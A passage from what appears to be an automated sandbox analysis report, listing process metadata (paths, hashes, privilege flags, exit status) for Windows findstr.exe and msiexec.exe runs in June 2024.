                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    General

                    Target ID:6
                    Start time:10:50:54
                    Start date:24/06/2024
                    Path:C:\Windows\SysWOW64\findstr.exe
                    Wow64 process (32bit):true
                    Commandline:findstr All
                    Imagebase:0x580000
                    File size:62'976 bytes
                    MD5 hash:18F02C555FBC9885DF9DB77754D6BB9B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    General

                    Target ID:7
                    Start time:10:50:56
                    Start date:24/06/2024
                    Path:C:\Windows\System32\msiexec.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\msiexec.exe /V
                    Imagebase:0xff1c0000
                    File size:128'512 bytes
                    MD5 hash:AC2E7152124CEED36846BD1B6592A00F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Disassembly

                    No disassembly